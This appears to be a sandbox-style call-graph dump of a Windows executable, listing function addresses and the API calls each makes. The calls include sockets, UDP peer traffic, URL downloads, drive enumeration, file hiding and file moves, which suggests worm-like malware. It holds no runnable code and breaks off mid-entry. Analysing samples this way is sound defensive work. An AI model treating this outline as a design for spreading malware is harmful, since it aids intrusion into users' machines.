5110 40dee2 5104->5110 5153 40e510 5104->5153 5107 40e32f 5107->5110 5158 40e3c0 5107->5158 5108 40e510 6 API calls 5108->5107 5110->5030 5111 40cea0 5110->5111 5174 40ce10 5111->5174 5119 40563d 5114->5119 5115 405643 lstrlenA 5115->5119 5120 405656 5115->5120 5117 40a450 _invalid_parameter 7 API calls 5117->5119 5119->5115 5119->5117 5119->5120 5121 40a660 _invalid_parameter 3 API calls 5119->5121 5122 4055d0 5119->5122 5126 405580 5119->5126 5120->5088 5120->5089 5121->5119 5123 4055e7 MultiByteToWideChar 5122->5123 5124 4055da lstrlenA 5122->5124 5125 40560c 5123->5125 5124->5123 5125->5119 5127 40558b 5126->5127 5128 405591 lstrlenA 5127->5128 5129 4055d0 2 API calls 5127->5129 5130 4055c7 5127->5130 5128->5127 5129->5127 5130->5119 5132 40e446 5131->5132 5133 40e4c3 lstrcmpiW 5132->5133 5134 40decd 5132->5134 5135 40e4db SysFreeString 5132->5135 5133->5132 5133->5135 5134->5024 5134->5098 5135->5132 5137 40e716 5136->5137 5138 40e2bb 5137->5138 5139 40e7a3 lstrcmpiW 5137->5139 5138->5110 5148 40e850 5138->5148 5140 40e823 SysFreeString 5139->5140 5141 40e7b6 5139->5141 5140->5138 5142 40e3c0 2 API calls 5141->5142 5144 40e7c4 5142->5144 5143 40e815 5143->5140 5144->5140 5144->5143 5145 40e7f3 lstrcmpiW 5144->5145 5146 40e805 5145->5146 5147 40e80b SysFreeString 5145->5147 5146->5147 5147->5143 5149 40e3c0 2 API calls 5148->5149 5151 40e86b 5149->5151 5150 40e2d9 5150->5103 5150->5110 5151->5150 5152 40e6f0 6 API calls 5151->5152 5152->5150 5154 40e3c0 2 API calls 5153->5154 5156 40e52b 5154->5156 5155 40e315 5155->5107 5155->5108 5156->5155 5162 40e590 5156->5162 5159 40e3e6 5158->5159 5160 40e420 2 API calls 5159->5160 5161 40e3fd 5159->5161 5160->5161 5161->5110 5164 40e5b6 5162->5164 5163 40e6cd 5163->5155 5164->5163 5165 40e643 lstrcmpiW 5164->5165 5166 40e6c3 SysFreeString 5165->5166 5167 40e656 5165->5167 5166->5163 5168 40e3c0 2 API calls 5167->5168 5170 40e664 5168->5170 5169 40e6b5 5169->5166 5170->5166 5170->5169 5171 40e693 lstrcmpiW 5170->5171 5172 40e6a5 5171->5172 5173 40e6ab SysFreeString 5171->5173 5172->5173 5173->5169 5178 40ce1d 5174->5178 5175 40ce38 SysFreeString 5175->5030 5176 40a490 9 API calls 5176->5178 5177 40cdc0 _vscprintf wvsprintfA 5177->5178 5178->5175 5178->5176 5178->5177 5180 40af1c socket 5179->5180 5181 40af09 gethostbyname 5179->5181 5180->5036 5180->5037 5181->5180 5182->5036 5183->5043 5185 40e977 5184->5185 5186 40ea44 InternetConnectA 5184->5186 5185->5048 5185->5049 5187 40ebc4 InternetCloseHandle 5186->5187 5188 40ea7d HttpOpenRequestA 5186->5188 5187->5185 5189 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5188->5189 5190 40ebb7 InternetCloseHandle 5188->5190 5191 40ebaa InternetCloseHandle 5189->5191 5194 40eafd 5189->5194 5190->5187 5191->5190 5192 40eb14 InternetReadFile 5193 40eb41 5192->5193 5192->5194 5193->5191 5194->5192 5194->5193 5195 40a490 9 API calls 5194->5195 5196 40eb5c memcpy 5195->5196 5196->5194 5203 406ff7 5197->5203 5198 407250 CoCreateInstance 5198->5203 5199 4071cb 5201 4071d4 SysFreeString 5199->5201 5202 406f9b SysFreeString 5199->5202 5200 40a660 _invalid_parameter 3 API calls 5200->5199 5201->5202 5202->4488 5203->5198 5204 407146 SysAllocString 5203->5204 5205 407012 5203->5205 5204->5203 5204->5205 5205->5199 5205->5200 5207 40c37a 5206->5207 5208 40c37e 5206->5208 5207->4494 5210 40c330 CryptAcquireContextW 5208->5210 5211 40c36b 5210->5211 5212 40c34d CryptGenRandom CryptReleaseContext 5210->5212 5211->5207 5212->5211 5213->4520 5265 40b280 gethostname 5214->5265 5218 40b37c strcmp 5219 40b391 5218->5219 5239 40b369 5218->5239 5269 40aed0 inet_ntoa 5219->5269 5221 40b39f strstr 5222 40b3f0 5221->5222 5223 40b3af 5221->5223 5270 40aed0 inet_ntoa 5222->5270 5272 40aed0 inet_ntoa 5223->5272 5226 40b3bd strstr 5228 40b3cd 5226->5228 5226->5239 5227 40b3fe strstr 5229 40b40e 5227->5229 5230 40b44f 5227->5230 5273 40aed0 inet_ntoa 5228->5273 5274 40aed0 inet_ntoa 5229->5274 5271 40aed0 inet_ntoa 5230->5271 5234 40b45d strstr 5237 40b46d 5234->5237 5238 40b4ae EnterCriticalSection 5234->5238 5235 40b3db strstr 5235->5222 5235->5239 5236 40b41c strstr 5236->5239 5240 40b42c 5236->5240 5276 40aed0 inet_ntoa 5237->5276 5242 40b4c6 5238->5242 5239->4520 5275 40aed0 inet_ntoa 5240->5275 5250 40b4f1 5242->5250 5278 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5242->5278 5244 40b47b strstr 5244->5239 5246 40b48b 5244->5246 5245 40b43a strstr 5245->5230 5245->5239 5277 40aed0 inet_ntoa 5246->5277 5249 40b5ea LeaveCriticalSection 5249->5239 5250->5249 5252 40a240 7 API calls 5250->5252 5251 40b499 strstr 5251->5238 5251->5239 5253 40b535 5252->5253 5253->5249 5279 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5253->5279 5255 40b553 5256 40b580 5255->5256 5257 40b576 Sleep 5255->5257 5259 40b5a5 5255->5259 5258 40a660 _invalid_parameter 3 API calls 5256->5258 5257->5255 5258->5259 5259->5249 5280 40b030 5259->5280 5262 40b030 14 API calls 5261->5262 5263 40b023 LeaveCriticalSection 5262->5263 5263->4516 5264->4522 5266 40b2a7 gethostbyname 5265->5266 5267 40b2c3 5265->5267 5266->5267 5267->5239 5268 40aed0 inet_ntoa 5267->5268 5268->5218 5269->5221 5270->5227 5271->5234 5272->5226 5273->5235 5274->5236 5275->5245 5276->5244 5277->5251 5278->5250 5279->5255 5281 40b044 5280->5281 5282 40b03f 5280->5282 5283 40a450 _invalid_parameter 7 API calls 5281->5283 5282->5249 5285 40b058 5283->5285 5284 40b0b4 CreateFileW 5286 40b103 InterlockedExchange 5284->5286 5287 40b0d7 WriteFile FlushFileBuffers CloseHandle 5284->5287 5285->5282 5285->5284 5288 40a660 _invalid_parameter 3 API calls 5286->5288 5287->5286 5288->5282 5290 40d70d 5289->5290 5291 40d643 5290->5291 5292 40d731 WaitForSingleObject 5290->5292 5291->4529 5291->4530 5292->5290 5293 40d74c CloseHandle 5292->5293 5293->5290 5295 40b8d3 WaitForSingleObject 5294->5295 5296 40b901 5295->5296 5297 40b8eb InterlockedDecrement 5295->5297 5298 40b8fa 5297->5298 5298->5295 5299 40b010 16 API calls 5298->5299 5299->5298 5301 401f92 5300->5301 5302 402008 5300->5302 5303 401f97 WSAGetOverlappedResult 5301->5303 5361 401d60 5301->5361 5303->5301 5304 401fb9 WSAGetLastError 5303->5304 5304->5301 5306 401fd3 GetQueuedCompletionStatus 5306->5301 5306->5302 5308 40d364 5307->5308 5310 40d380 WaitForSingleObject 5308->5310 5312 40d3a5 5308->5312 5402 40b6b0 EnterCriticalSection 5308->5402 5407 40cf80 InterlockedExchangeAdd 5308->5407 5310->5308 5310->5312 5581 4013b0 5313->5581 5315 40da90 5316 40b6b0 5 API calls 5317 40da0d 5316->5317 5317->5315 5317->5316 5318 40da27 InterlockedExchangeAdd 5317->5318 5319 40da6b WaitForSingleObject 5317->5319 5321 40b9d0 17 API calls 5317->5321 5318->5317 5318->5319 5319->5317 5320 40da84 5319->5320 5594 401330 5320->5594 5321->5317 5634 401470 5324->5634 5326 40dab4 5327 40dae2 5326->5327 5328 40dac5 WaitForSingleObject 5326->5328 5329 401330 8 API calls 5328->5329 5330 40dadf 5329->5330 5330->5327 5332 401ac9 5331->5332 5333 40194d WSAWaitForMultipleEvents 5331->5333 5334 4019f0 GetTickCount 5333->5334 5335 40196a WSAEnumNetworkEvents 5333->5335 5336 401a43 GetTickCount 5334->5336 5337 401a05 EnterCriticalSection 5334->5337 5335->5334 5350 401983 5335->5350 5340 401ab5 WaitForSingleObject 5336->5340 5341 401a4e EnterCriticalSection 5336->5341 5338 401a16 5337->5338 5339 401a3a LeaveCriticalSection 5337->5339 5345 401a29 LeaveCriticalSection 5338->5345 5669 401820 5338->5669 5339->5340 5340->5332 5340->5333 5343 401aa1 LeaveCriticalSection GetTickCount 5341->5343 5344 401a5f InterlockedExchangeAdd 5341->5344 5342 401992 accept 5342->5334 5342->5350 5343->5340 5687 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5344->5687 5345->5340 5349 401a72 5349->5343 5349->5344 5688 40aff0 shutdown closesocket 5349->5688 5350->5334 5350->5342 5352 4019e9 5350->5352 5649 4022c0 5350->5649 5353 401cf0 7 API calls 5352->5353 5353->5334 5702 4021b0 5354->5702 5357 40d3f2 5358 40d3d5 WaitForSingleObject 5706 401600 5358->5706 5362 401ef2 InterlockedDecrement setsockopt closesocket 5361->5362 5363 401d74 5361->5363 5365 401e39 5362->5365 5363->5362 5364 401d7c 5363->5364 5381 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5364->5381 5365->5306 5367 401d81 InterlockedExchange 5368 401d98 5367->5368 5369 401e4e 5367->5369 5368->5365 5374 401da9 InterlockedDecrement 5368->5374 5375 401dbc InterlockedDecrement InterlockedExchangeAdd 5368->5375 5370 401e67 5369->5370 5371 401e57 InterlockedDecrement 5369->5371 5372 401e72 5370->5372 5373 401e87 InterlockedDecrement 5370->5373 5371->5306 5390 401ae0 WSASend 5372->5390 5377 401ee9 5373->5377 5374->5306 5378 401e2f 5375->5378 5377->5306 5382 401cf0 5378->5382 5379 401e7e 5379->5306 5381->5367 5383 401d00 InterlockedExchangeAdd 5382->5383 5384 401cfc 5382->5384 5385 401d53 5383->5385 5386 401d17 InterlockedIncrement 5383->5386 5384->5365 5385->5365 5396 401c50 WSARecv 5386->5396 5388 401d46 5388->5385 5389 401d4c InterlockedDecrement 5388->5389 5389->5385 5391 401b50 5390->5391 5392 401b12 WSAGetLastError 5390->5392 5391->5379 5392->5391 5393 401b1f 5392->5393 5394 401b56 5393->5394 5395 401b26 Sleep WSASend 5393->5395 5394->5379 5395->5391 5395->5392 5397 401cd2 5396->5397 5398 401c8e 5396->5398 5397->5388 5399 401c90 WSAGetLastError 5398->5399 5400 401ca4 Sleep WSARecv 5398->5400 5401 401cdb 5398->5401 5399->5397 5399->5398 5400->5397 5400->5399 5401->5388 5403 40b6e7 LeaveCriticalSection 5402->5403 5404 40b6cf 5402->5404 5403->5308 5405 40c370 3 API calls 5404->5405 5406 40b6da 5405->5406 5406->5403 5408 40cf9d 5407->5408 5419 40cf96 5407->5419 5425 40d270 5408->5425 5411 40cfbd InterlockedIncrement 5414 40cfc7 5411->5414 5413 40cff0 5435 40aed0 inet_ntoa 5413->5435 5414->5413 5417 40d0c0 InterlockedDecrement 5414->5417 5422 40d014 5414->5422 5432 40b9d0 5414->5432 5416 40cffc 5416->5417 5450 40aff0 shutdown closesocket 5417->5450 5419->5308 5420 40a450 _invalid_parameter 7 API calls 5420->5422 5421 40d1a0 6 API calls 5421->5422 5422->5414 5422->5420 5422->5421 5424 40a660 _invalid_parameter 3 API calls 5422->5424 5436 40ba20 5422->5436 5424->5422 5426 40d27d socket 5425->5426 5427 40d292 htons connect 5426->5427 5428 40d2ef 5426->5428 5427->5428 5430 40d2da 5427->5430 5428->5426 5429 40cfad 5428->5429 5429->5411 5429->5419 5451 40aff0 shutdown closesocket 5430->5451 5452 40b930 5432->5452 5435->5416 5442 40ba31 5436->5442 5439 40a660 _invalid_parameter 3 API calls 5440 40bdff 5439->5440 5440->5422 5441 40be10 25 API calls 5441->5442 5442->5441 5445 40b9d0 17 API calls 5442->5445 5446 40ba4f 5442->5446 5447 40b330 32 API calls 5442->5447 5481 40bf60 5442->5481 5488 40b700 EnterCriticalSection 5442->5488 5493 406e20 5442->5493 5498 406ec0 5442->5498 5503 406cf0 5442->5503 5510 406df0 5442->5510 5445->5442 5446->5439 5447->5442 5450->5419 5451->5429 5453 40c3b0 3 API calls 5452->5453 5454 40b93b 5453->5454 5455 40b957 lstrlenA 5454->5455 5456 40c640 7 API calls 5455->5456 5457 40b98d 5456->5457 5458 40b9b8 5457->5458 5462 40d9d0 5457->5462 5458->5414 5460 40a660 _invalid_parameter 3 API calls 5460->5458 5465 401200 5462->5465 5464 40b9ac 5464->5460 5466 401314 5465->5466 5467 40121d 5465->5467 5466->5464 5467->5466 5468 40a450 _invalid_parameter 7 API calls 5467->5468 5469 401247 memcpy htons 5468->5469 5470 4012ed 5469->5470 5471 401297 sendto 5469->5471 5472 40a660 _invalid_parameter 3 API calls 5470->5472 5473 4012b6 InterlockedExchangeAdd 5471->5473 5474 4012e9 5471->5474 5476 4012fc 5472->5476 5473->5471 5477 4012cc 5473->5477 5474->5470 5475 40130a 5474->5475 5478 40a660 _invalid_parameter 3 API calls 5475->5478 5476->5464 5479 40a660 _invalid_parameter 3 API calls 5477->5479 5478->5466 5480 4012db 5479->5480 5480->5464 5482 40bf71 lstrlenA 5481->5482 5483 40c640 7 API calls 5482->5483 5484 40bf8f 5483->5484 5484->5482 5486 40bf9b 5484->5486 5485 40a660 _invalid_parameter 3 API calls 5487 40c01f 5485->5487 5486->5485 5486->5487 5487->5442 5490 40b718 5488->5490 5489 40b754 LeaveCriticalSection 5489->5442 5490->5489 5513 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5490->5513 5492 40b743 5492->5489 5514 406e60 5493->5514 5496 40d610 339 API calls 5497 406e59 5496->5497 5497->5442 5499 406e60 75 API calls 5498->5499 5500 406edf 5499->5500 5501 406f0c 5500->5501 5529 406f20 5500->5529 5501->5442 5532 405f40 EnterCriticalSection 5503->5532 5505 406d0a 5509 406d3d 5505->5509 5537 406d50 5505->5537 5508 40a660 _invalid_parameter 3 API calls 5508->5509 5509->5442 5544 406000 EnterCriticalSection 5510->5544 5512 406e12 5512->5442 5513->5492 5515 406e73 5514->5515 5517 406e34 5515->5517 5518 405e50 EnterCriticalSection 5515->5518 5517->5496 5517->5497 5519 40ccd0 71 API calls 5518->5519 5521 405e6e 5519->5521 5520 405f2b LeaveCriticalSection 5520->5515 5521->5520 5522 405e87 5521->5522 5526 405ea8 5521->5526 5523 405e91 memcpy 5522->5523 5524 405ea6 5522->5524 5523->5524 5525 40a660 _invalid_parameter 3 API calls 5524->5525 5527 405f28 5525->5527 5526->5524 5528 405f06 memcpy 5526->5528 5527->5520 5528->5524 5530 40b930 17 API calls 5529->5530 5531 406f65 5530->5531 5531->5501 5533 405f5e 5532->5533 5534 405fea LeaveCriticalSection 5533->5534 5535 40a6d0 8 API calls 5533->5535 5534->5505 5536 405fbc 5535->5536 5536->5534 5538 40a450 _invalid_parameter 7 API calls 5537->5538 5539 406d62 memcpy 5538->5539 5540 40b930 17 API calls 5539->5540 5541 406dcc 5540->5541 5542 40a660 _invalid_parameter 3 API calls 5541->5542 5543 406d31 5542->5543 5543->5508 5569 40cd30 5544->5569 5547 406243 LeaveCriticalSection 5547->5512 5548 40ccd0 71 API calls 5549 406039 5548->5549 5549->5547 5551 406094 memcpy 5549->5551 5568 406158 5549->5568 5550 406181 5552 40a660 _invalid_parameter 3 API calls 5550->5552 5553 40a660 _invalid_parameter 3 API calls 5551->5553 5555 4061a2 5552->5555 5556 4060b8 5553->5556 5554 405c90 75 API calls 5554->5550 5555->5547 5557 4061b1 CreateFileW 5555->5557 5558 40a6d0 8 API calls 5556->5558 5557->5547 5560 4061d4 5557->5560 5559 4060c8 5558->5559 5561 40a660 _invalid_parameter 3 API calls 5559->5561 5563 4061f1 WriteFile 5560->5563 5564 40622f FlushFileBuffers CloseHandle 5560->5564 5562 4060ef 5561->5562 5565 40c640 7 API calls 5562->5565 5563->5560 5564->5547 5566 406125 5565->5566 5567 4072a0 71 API calls 5566->5567 5567->5568 5568->5550 5568->5554 5572 40c280 5569->5572 5573 40c291 5572->5573 5574 40a6d0 8 API calls 5573->5574 5575 40c2ab 5573->5575 5576 40c1e0 70 API calls 5573->5576 5579 407fa0 68 API calls 5573->5579 5580 40c2eb memcmp 5573->5580 5574->5573 5577 40a660 _invalid_parameter 3 API calls 5575->5577 5576->5573 5578 406022 5577->5578 5578->5547 5578->5548 5579->5573 5580->5573 5580->5575 5582 40a240 7 API calls 5581->5582 5583 4013bb CreateEventA socket 5582->5583 5584 4013f2 5583->5584 5585 4013fd 5583->5585 5586 401330 8 API calls 5584->5586 5587 401401 bind 5585->5587 5588 401462 5585->5588 5589 4013f8 5586->5589 5590 401444 CreateThread 5587->5590 5591 401434 5587->5591 5588->5317 5589->5585 5590->5588 5604 401100 5590->5604 5592 401330 8 API calls 5591->5592 5593 40143a 5592->5593 5593->5317 5595 401339 5594->5595 5602 40139b 5594->5602 5596 401341 SetEvent WaitForSingleObject CloseHandle 5595->5596 5595->5602 5597 401369 5596->5597 5603 40138b 5596->5603 5599 40a660 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 5597->5599 5597->5603 5599->5597 5600 401395 5601 40a660 _invalid_parameter 3 API calls 5600->5601 5601->5602 5602->5315 5633 40aff0 shutdown closesocket 5603->5633 5605 401115 ioctlsocket 5604->5605 5606 4011e4 5605->5606 5612 40113a 5605->5612 5607 40a660 _invalid_parameter 3 API calls 5606->5607 5609 4011ea 5607->5609 5608 4011cd WaitForSingleObject 5608->5605 5608->5606 5610 40a490 9 API calls 5610->5612 5611 401168 recvfrom 5611->5608 5611->5612 5612->5608 5612->5610 5612->5611 5613 4011ad InterlockedExchangeAdd 5612->5613 5615 401000 5613->5615 5616 401014 5615->5616 5617 40103b 5616->5617 5619 40a240 7 API calls 5616->5619 5626 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5617->5626 5619->5617 5620 40105b 5627 401580 5620->5627 5622 4010ec 5622->5612 5623 401071 5623->5622 5624 4010a3 IsBadReadPtr 5623->5624 5625 4010d8 memmove 5623->5625 5624->5623 5625->5623 5626->5620 5628 401592 5627->5628 5629 4015a5 memcpy 5627->5629 5631 40a490 9 API calls 5628->5631 5630 4015c1 5629->5630 5630->5623 5632 40159f 5631->5632 5632->5629 5633->5600 5635 401483 5634->5635 5636 401572 5634->5636 5635->5636 5637 40a240 7 API calls 5635->5637 5636->5326 5638 401498 CreateEventA socket 5637->5638 5639 4014da 5638->5639 5640 4014cf 5638->5640 5639->5636 5642 4014e2 htons setsockopt bind 5639->5642 5641 401330 8 API calls 5640->5641 5643 4014d5 5641->5643 5644 401546 5642->5644 5645 401558 CreateThread 5642->5645 5643->5639 5646 401330 8 API calls 5644->5646 5645->5636 5648 401100 20 API calls _invalid_parameter 5645->5648 5647 40154c 5646->5647 5647->5326 5650 4022d2 EnterCriticalSection 5649->5650 5651 4022cd 5649->5651 5652 4022e7 5650->5652 5653 4022fd LeaveCriticalSection 5650->5653 5651->5350 5652->5653 5654 402308 5653->5654 5655 40230f 5653->5655 5654->5350 5656 40a240 7 API calls 5655->5656 5657 402319 5656->5657 5658 402326 getpeername CreateIoCompletionPort 5657->5658 5659 4023b8 5657->5659 5661 4023b2 5658->5661 5662 402366 5658->5662 5691 40aff0 shutdown closesocket 5659->5691 5663 40a660 _invalid_parameter 3 API calls 5661->5663 5689 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5662->5689 5663->5659 5664 4023c3 5664->5350 5666 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5690 4021e0 EnterCriticalSection LeaveCriticalSection 5666->5690 5668 4023ab 5668->5350 5670 40190f 5669->5670 5671 401830 5669->5671 5670->5339 5671->5670 5672 40183d InterlockedExchangeAdd 5671->5672 5672->5670 5678 401854 5672->5678 5673 401880 5674 401891 5673->5674 5701 40aff0 shutdown closesocket 5673->5701 5675 4018a7 InterlockedDecrement 5674->5675 5679 401901 5674->5679 5675->5679 5678->5670 5678->5673 5692 4017a0 EnterCriticalSection 5678->5692 5680 402247 5679->5680 5681 402265 EnterCriticalSection 5679->5681 5680->5339 5682 40229c LeaveCriticalSection DeleteCriticalSection 5681->5682 5685 40227d 5681->5685 5683 40a660 _invalid_parameter 3 API calls 5682->5683 5683->5680 5684 40a660 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 5684->5685 5685->5684 5686 40229b 5685->5686 5686->5682 5687->5349 5688->5349 5689->5666 5690->5668 5691->5664 5693 401807 LeaveCriticalSection 5692->5693 5694 4017ba InterlockedExchangeAdd 5692->5694 5693->5678 5695 4017ca LeaveCriticalSection 5694->5695 5696 4017d9 5694->5696 5695->5678 5697 40a660 _invalid_parameter 3 API calls 5696->5697 5698 4017fe 5697->5698 5699 40a660 _invalid_parameter 3 API calls 5698->5699 5700 401804 5699->5700 5700->5693 5701->5674 5703 4021bb 5702->5703 5705 4021cf 5702->5705 5703->5705 5727 402020 5703->5727 5705->5357 5705->5358 5707 40160d 5706->5707 5726 401737 5706->5726 5708 401619 EnterCriticalSection 5707->5708 5707->5726 5709 4016b5 LeaveCriticalSection SetEvent 5708->5709 5712 401630 5708->5712 5710 4016d0 5709->5710 5711 4016e8 5709->5711 5714 4016d6 PostQueuedCompletionStatus 5710->5714 5715 40d780 11 API calls 5711->5715 5712->5709 5713 401641 InterlockedDecrement 5712->5713 5716 40165a InterlockedExchangeAdd 5712->5716 5724 4016a0 InterlockedDecrement 5712->5724 5713->5712 5714->5711 5714->5714 5717 4016f3 5715->5717 5716->5712 5718 40166d InterlockedIncrement 5716->5718 5719 40d8c0 7 API calls 5717->5719 5720 401c50 4 API calls 5718->5720 5721 4016fc CloseHandle CloseHandle WSACloseEvent 5719->5721 5720->5712 5749 40aff0 shutdown closesocket 5721->5749 5723 401724 DeleteCriticalSection 5725 40a660 _invalid_parameter 3 API calls 5723->5725 5724->5712 5725->5726 5726->5357 5728 40a240 7 API calls 5727->5728 5729 40202b 5728->5729 5730 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5729->5730 5731 4021aa 5729->5731 5732 402076 CreateIoCompletionPort 5730->5732 5733 40219f 5730->5733 5731->5705 5732->5733 5734 40208f 5732->5734 5735 401600 36 API calls 5733->5735 5736 40d5e0 8 API calls 5734->5736 5737 4021a5 5735->5737 5738 402094 5736->5738 5737->5731 5738->5733 5739 40209f WSASocketA 5738->5739 5739->5733 5740 4020bd setsockopt htons bind 5739->5740 5740->5733 5741 402126 listen 5740->5741 5741->5733 5742 40213a WSACreateEvent 5741->5742 5742->5733 5743 402147 WSAEventSelect 5742->5743 5743->5733 5747 402159 5743->5747 5744 40217f 5746 40d610 328 API calls 5744->5746 5745 40d610 328 API calls 5745->5747 5748 402194 5746->5748 5747->5744 5747->5745 5748->5705 5749->5723 5751 405829 memset GetModuleHandleW 5750->5751 5752 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5751->5752 5752->5752 5753 4058a0 CreateWindowExW 5752->5753 5754 4058cb 5753->5754 5755 4058cd GetMessageA 5753->5755 5756 4058ff ExitThread 5754->5756 5757 4058e1 TranslateMessage DispatchMessageA 5755->5757 5758 4058f7 5755->5758 5757->5755 5758->5751 5758->5756 5781 40ec20 CreateFileW 5759->5781 5761 406cd8 ExitThread 5763 406b80 5763->5761 5764 406cc8 Sleep 5763->5764 5765 406bb9 5763->5765 5784 406340 GetLogicalDrives 5763->5784 5764->5763 5790 406260 5765->5790 5768 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5769 406c66 wsprintfW 5768->5769 5770 406c7b wsprintfW 5768->5770 5769->5770 5796 406650 _chkstk 5770->5796 5771 406beb 5778 407407 5774->5778 5775 4074e1 Sleep 5775->5778 5776 40742f Sleep 5776->5778 5777 40745e Sleep wsprintfA DeleteUrlCacheEntry 5849 40eee0 InternetOpenA 5777->5849 5778->5775 5778->5776 5778->5777 5780 40ef90 64 API calls 5778->5780 5780->5778 5782 40ec68 5781->5782 5783 40ec4f GetFileSize FindCloseChangeNotification 5781->5783 5782->5763 5783->5782 5789 40636d 5784->5789 5785 4063e6 5785->5763 5786 40637c RegOpenKeyExW 5787 40639e RegQueryValueExW 5786->5787 5786->5789 5788 4063da RegCloseKey 5787->5788 5787->5789 5788->5789 5789->5785 5789->5786 5789->5788 5791 4062b9 5790->5791 5792 40627c 5790->5792 5791->5768 5791->5771 5831 4062c0 GetDriveTypeW 5792->5831 5795 4062ab lstrcpyW 5795->5791 5797 406667 5796->5797 5798 40666e 6 API calls 5796->5798 5797->5771 5799 406722 5798->5799 5800 406764 PathFileExistsW 5798->5800 5803 40ec20 3 API calls 5799->5803 5801 406803 PathFileExistsW 5800->5801 5802 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5800->5802 5806 406814 5801->5806 5807 406859 FindFirstFileW 5801->5807 5804 4067a9 CreateDirectoryW 5802->5804 5805 4067cb PathFileExistsW 5802->5805 5808 40672e 5803->5808 5804->5805 5810 4067bc SetFileAttributesW 5804->5810 5805->5801 5811 4067dc CopyFileW 5805->5811 5812 406834 5806->5812 5813 40681c 5806->5813 5807->5797 5809 406880 5807->5809 5808->5800 5814 406745 SetFileAttributesW DeleteFileW 5808->5814 5815 406942 lstrcmpW 5809->5815 5821 406b19 FindNextFileW 5809->5821 5824 40699e lstrcmpiW 5809->5824 5825 406a05 PathMatchSpecW 5809->5825 5827 406a83 PathFileExistsW 5809->5827 5840 406510 CreateDirectoryW wsprintfW FindFirstFileW 5809->5840 5810->5805 5811->5801 5816 4067f4 SetFileAttributesW 5811->5816 5818 406400 3 API calls 5812->5818 5836 406400 CoInitialize CoCreateInstance 5813->5836 5814->5800 5815->5809 5819 406958 lstrcmpW 5815->5819 5816->5801 5820 40682f SetFileAttributesW 5818->5820 5819->5809 5820->5807 5821->5815 5823 406b35 FindClose 5821->5823 5823->5797 5824->5809 5825->5809 5826 406a26 wsprintfW SetFileAttributesW DeleteFileW 5825->5826 5826->5809 5827->5809 5828 406a99 wsprintfW wsprintfW 5827->5828 5828->5809 5829 406b03 MoveFileExW 5828->5829 5829->5821 5832 40629f 5831->5832 5833 4062e8 5831->5833 5832->5791 5832->5795 5833->5832 5834 4062fc QueryDosDeviceW 5833->5834 5834->5832 5835 406316 StrCmpNW 5834->5835 5835->5832 5837 406436 5836->5837 5839 406472 5836->5839 5838 406440 wsprintfW 5837->5838 5837->5839 5838->5839 5839->5820 5841 406565 lstrcmpW 5840->5841 5842 40663f 5840->5842 5843 406591 5841->5843 5844 40657b lstrcmpW 5841->5844 5842->5809 5846 40660c FindNextFileW 5843->5846 5844->5843 5845 406593 wsprintfW wsprintfW 5844->5845 5845->5843 5847 4065f6 MoveFileExW 5845->5847 5846->5841 5848 406628 FindClose RemoveDirectoryW 5846->5848 5847->5846 5848->5842 5850 40ef06 InternetOpenUrlA 5849->5850 5851 40ef78 Sleep 5849->5851 5852 40ef25 HttpQueryInfoA 5850->5852 5853 40ef6e InternetCloseHandle 5850->5853 5851->5778 5854 40ef64 InternetCloseHandle 5852->5854 5855 40ef4e 5852->5855 5853->5851 5854->5853 5855->5854 5948 40d400 5949 40d416 5948->5949 5964 40d46e 5948->5964 5950 40d420 5949->5950 5951 40d473 5949->5951 5952 40d4c3 5949->5952 5949->5964 5955 40a240 7 API calls 5950->5955 5953 40d498 5951->5953 5954 40d48b InterlockedDecrement 5951->5954 5982 40c070 5952->5982 5957 40a660 _invalid_parameter 3 API calls 5953->5957 5954->5953 5958 40d42d 5955->5958 5959 40d4a4 5957->5959 5971 4023d0 5958->5971 5961 40a660 _invalid_parameter 3 API calls 5959->5961 5961->5964 5966 40d45b InterlockedIncrement 5966->5964 5967 40d4e9 5967->5964 5968 40d521 IsBadReadPtr 5967->5968 5970 40ba20 339 API calls 5967->5970 5987 40c170 5967->5987 5968->5967 5970->5967 5972 402413 5971->5972 5973 4023d9 5971->5973 5975 40b1f0 5972->5975 5973->5972 5974 4023ea InterlockedIncrement 5973->5974 5974->5972 5976 40b280 2 API calls 5975->5976 5977 40b1ff 5976->5977 5978 40b209 5977->5978 5979 40b20d EnterCriticalSection 5977->5979 5978->5964 5978->5966 5981 40b22c LeaveCriticalSection 5979->5981 5981->5978 5983 40c083 5982->5983 5984 40c0ad memcpy 5982->5984 5985 40a490 9 API calls 5983->5985 5984->5967 5986 40c0a4 5985->5986 5986->5984 5988 40c199 5987->5988 5989 40c18e 5987->5989 5988->5989 5990 40c1b1 memmove 5988->5990 5989->5967 5990->5989 5991 40cf40 5992 40b1f0 4 API calls 5991->5992 5993 40cf53 5992->5993 5994 40cf80 339 API calls 5993->5994 5995 40cf6a 5993->5995 5994->5995 5996 40d980 5997 40ba20 339 API calls 5996->5997 5998 40d9b8 5997->5998 5999 40d580 6004 401b60 5999->6004 6001 40d595 6002 40d5b4 6001->6002 6003 401b60 16 API calls 6001->6003 6003->6002 6005 401c42 6004->6005 6006 401b70 6004->6006 6005->6001 6006->6005 6007 40a240 7 API calls 6006->6007 6008 401b9d 6007->6008 6008->6005 6009 40a6d0 8 API calls 6008->6009 6010 401bc9 6009->6010 6011 401be6 6010->6011 6012 401bd6 6010->6012 6014 401ae0 4 API calls 6011->6014 6013 40a660 _invalid_parameter 3 API calls 6012->6013 6015 401bdc 6013->6015 6016 401bf3 6014->6016 6015->6001 6017 401c33 6016->6017 6018 401bfc EnterCriticalSection 6016->6018 6021 40a660 _invalid_parameter 3 API calls 6017->6021 6019 401c13 6018->6019 6020 401c1f LeaveCriticalSection 6018->6020 6019->6020 6020->6001 6022 401c3c 6021->6022 6023 40a660 _invalid_parameter 3 API calls 6022->6023 6023->6005 6075 40d0e0 6080 40d140 6075->6080 6077 